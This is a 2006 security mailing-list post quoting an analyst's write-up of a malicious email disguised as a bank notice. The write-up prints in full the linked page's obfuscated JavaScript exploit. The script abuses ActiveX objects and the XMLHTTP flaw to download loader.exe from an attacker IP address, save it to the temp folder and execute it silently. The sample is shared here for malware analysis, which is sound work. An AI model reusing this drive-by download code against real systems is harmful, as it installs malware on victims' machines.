funsec mailing list archives
RE: funsec Digest, Vol 15, Issue 45
From: "Randall M" <randallm () fidmail com>
Date: Fri, 17 Nov 2006 18:46:01 -0600
Thanks Larry. When I get home I'm going to run this in Vmware. Thank You Randall M ===================== "You too can have your very own Computer!" Note: Side effects include: Blue screens; interrupt violation; illegal operations; remote code exploitations; virus and malware infestations; and other unknown vulnerabilities. [-----Original Message----- [From: funsec-bounces () linuxbox org [[mailto:funsec-bounces () linuxbox org] On Behalf Of [funsec-request () linuxbox org [Sent: Friday, November 17, 2006 1:53 PM [To: funsec () linuxbox org [Subject: funsec Digest, Vol 15, Issue 45 [ [Send funsec mailing list submissions to [ funsec () linuxbox org [ [To subscribe or unsubscribe via the World Wide Web, visit [ https://linuxbox.org/cgi-bin/mailman/listinfo/funsec [or, via email, send a message with subject or body 'help' to [ funsec-request () linuxbox org [ [You can reach the person managing the list at [ funsec-owner () linuxbox org [ [When replying, please edit your Subject line so it is more [specific than "Re: Contents of funsec digest..." [ [ [Today's Topics: [ [ 1. Attack of the Day (Larry Seltzer) [ [ [---------------------------------------------------------------------- [ [Message: 1 [Date: Fri, 17 Nov 2006 14:50:16 -0500 [From: Larry Seltzer <Larry () larryseltzer com> [Subject: [funsec] Attack of the Day [To: "FunSec [List]" <funsec () linuxbox org> [Message-ID: [ [<0273B67044957C41BD71D12EBA2E00AE08C2AE@becca.LarrySeltzer.local> [Content-Type: text/plain; charset="us-ascii" [ [I got an interesting attack e-mail today. At first it looked [like a phish. This was the message: [ [ From: estell esmaria [mailto:siselynevin () responsebase com] [ Sent: Friday, November 17, 2006 12:11 PM [ To: horatius augustine [ Subject: Fifth Third Bank informs you [ [ Hello again, [ please visit: http://66.45.250.194/~turnoff/hi/ [ [And it had a cyan background. Not much of a presentation. [ [I loaded the site in the body in my text editor (TextPad is [great for that, just file-open and give it the URL) and it's [not that long. [There's a global string array with a list of GUIDs that I've [commented up. The full source for the page is below. [ [ BD96C556-65A3-11D0-983A-00C04FC29E36 - RDS Data Control [ AB9BCEDD-EC7E-47E1-9322-D4A210617116 - ObjectFactory Class [ 0006F033-0000-0000-C000-000000000046 - Outlook Data Object [ 0006F03A-0000-0000-C000-000000000046 - Outlook.Application [ 6e32070a-766d-4ee6-879c-dc1fa91d2fc3 - MUWebControl Class [6414512B-B978-451D-A0D8-FCFDF33E833C - WUWebControl Class [7F5B7F63-F06F-4331-8A26-339E03C0AE3D - WMI Object Broker [ 06723E09-F4C2-43c8-8358-09FCD1DB0766 - VsmIDE.DTE [639F725F-1B2D-4831-A9FD-874847682010 - DExplore Application [Object, DExplore.AppObj.8.0 [ BA018599-1DB3-44f9-83B4-461454C84BF8 - Microsoft Visual [Studio DTE Object, VisualStudio.DTE.8.0 [ D0C07D56-7C69-43F1-B4A0-25F5A11FAB19 - Microsoft DbgClr DTE [Object, Microsoft.DbgClr.DTE.8.0 [E8CCCDDF-CA28-496b-B050-6C07C962476B - VsaIDE.DTE [ [I guess this is one of the exploits for the Microsoft XMLHTTP [bug they just patched. The page loops through each of these [GUIDs, creating an object and using it to create an XMLHTTP [object. It uses this to run shellcode in the form of the file [at http://66.45.250.194/~turnoff/hi/loader.exe. [ [I got the file and ran it through VirusTotal. Only four [engines said anything at all: [ [AntiVir 7.2.0.39 11.17.2006 HEUR/Crypted BitDefender 7.2 [11.17.2006 Generic.Malware.Sdldg.10CF2C7A eSafe 7.0.14.0 [11.16.2006 suspicious Trojan/Worm Fortinet 2.82.0.0 11.17.2006 [suspicious [ [Hooray for Antivir, the only one with something useful to say. [Here's Antivir's writeup on HEUR/Crypted: [http://www.avira.com/en/threats/section/fulldetails/id_vir/2704 [/heur_cry [pted.html [ [I've attached the file in a ZIP file with the password 'loader' [ [LJS [ [------------------------------------------------------ [ [[[!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" ["http://www.w3.org/TR/html4/strict.dtd";]] [[[html]][[head]][[title]]Google[[/title]] [[[script type="text/javascript" language="javascript"]] [ [var obj_t = new Array( [ 'BD96C556-65A3-11D0-983A-00C04FC29E36', [ 'AB9BCEDD-EC7E-47E1-9322-D4A210617116', [ '0006F033-0000-0000-C000-000000000046', [ '0006F03A-0000-0000-C000-000000000046', [ '6e32070a-766d-4ee6-879c-dc1fa91d2fc3', [ '6414512B-B978-451D-A0D8-FCFDF33E833C', [ '7F5B7F63-F06F-4331-8A26-339E03C0AE3D', [ '06723E09-F4C2-43c8-8358-09FCD1DB0766', [ '639F725F-1B2D-4831-A9FD-874847682010', [ 'BA018599-1DB3-44f9-83B4-461454C84BF8', [ 'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19', [ 'E8CCCDDF-CA28-496b-B050-6C07C962476B'); [ [function CreateO(o, n) { [ var r = null; [ try { eval('r = o.CreateObject(n)') }catch(e){} [ if (! r) { [ try { eval('r = o.CreateObject(n, "")') }catch(e){} [ } [ if (! r) { [ try { eval('r = o.CreateObject(n, "", "")') }catch(e){} [ } [ if (! r) { [ try { eval('r = o.GetObject("", n)') }catch(e){} [ } [ if (! r) { [ try { eval('r = o.GetObject(n, "")') }catch(e){} [ } [ if (! r) { [ try { eval('r = o.GetObject(n)') }catch(e){} [ } [ return(r); [} [ [function iii() { [ return true; [} [ [ [var iss = false; [uri = 'http://66.45.250.194/~turnoff/hi/loader.exe'; [window.onerror = iii; [var za = 'ting.FileS'; [var z = 'plication'; [var shellapp = 'Shell.Ap'+z; [var z01 = "r%20%3D%20o.Creat'+'eObject%'+'28n%29"; [var z02 = "r%20%3D%20o.Creat'+'eObject%28n%'+'2C%20%22%22%29"; [var z03 = ["r%20%3D%20o.Create'+'Object%28n%2C'+'%20%22%22%2C%20%22%22%29"; [var z04 = "r%20%3D%20o.GetOb'+'ject%28%'+'22%22%2C%20n%29"; [var z05 = "r%20%3D%20o.GetObject%28n%'+'2C%20%22%22%29"; [var z06 = "r%20%3D%2'+'0o.GetObject%28n%29"; [ [var a1 = 'ADO'; [var a2 = 'DB.'; [var a3 = 'Str'; [var a4 = 'eam'; [ [function rname() { [ var chars = ["0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz"; [ var string_length = 8; [ var randomstring = ''; [ for (var i=0; i[[string_length; i++) { [ var rnum = Math.floor(Math.random() * chars.length); [ randomstring += chars.substring(rnum,rnum+1); [ } [ [ return randomstring + '.com'; [} [ [function DoIt() [{ [ [ x.Open('GET',uri + '?e=' + escape(rname()),false); [ x.Send(); [ var fname1 = rname(); [ [ var f = xml.CreateObject('Scrip'+za+'ystemObject',''); [ [ var tmp = f.GetSpecialFolder(2); [ [ [ fname1 = f.BuildPath(tmp,fname1); [ [ S.open(); [ S.write(x.responseBody); [ S.savetofile(fname1,2); [ S.close(); [ var Q = xml.createobject(shellapp,''); [ Q.ShellExecute(fname1,'','','open',0); [} [ [ [[[/script]][[/head]][[body]] [ [ [[[script type="text/javascript" language="JavaScript"]] if [(navigator.userAgent.indexOf('MSIE') != -1) { [ var ni = 0; [ while (obj_t[ni]) { [ var xml = null; [ var xml = document.createElement('object'); [ guid = obj_t[ni]; [ xml.setAttribute('classid','clsid:'+guid); [ [ if (xml) { [ n_xml = 'Microsoft.XMLHTTP'; [ try { [ var x = null; [ [ var x = CreateO(xml,n_xml); [ [ if (x) { [ str1 = a1 + a2; [ str1 = str1 + a3 + a4; [ str5 = str1; [ var S = xml.CreateObject(str5,""); [ S.type = 1; [ str6 = 'GET'; [ DoIt(); [ } [ [ } catch(e){} [ } [ [ ni++; [ } [} [[[/script]] [[[/body]][[/html]] [-------------- next part -------------- [A non-text attachment was scrubbed... [Name: loader.zip [Type: application/x-zip-compressed [Size: 19607 bytes [Desc: loader.zip [Url : [http://linuxbox.org/pipermail/funsec/attachments/20061117/d4e77 [e05/loader.bin [ [------------------------------ [ [_______________________________________________ [funsec mailing list [funsec () linuxbox org [https://linuxbox.org/cgi-bin/mailman/listinfo/funsec [ [ [End of funsec Digest, Vol 15, Issue 45 [************************************** [ _______________________________________________ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list.
Current thread:
- RE: funsec Digest, Vol 15, Issue 45 Randall M (Nov 17)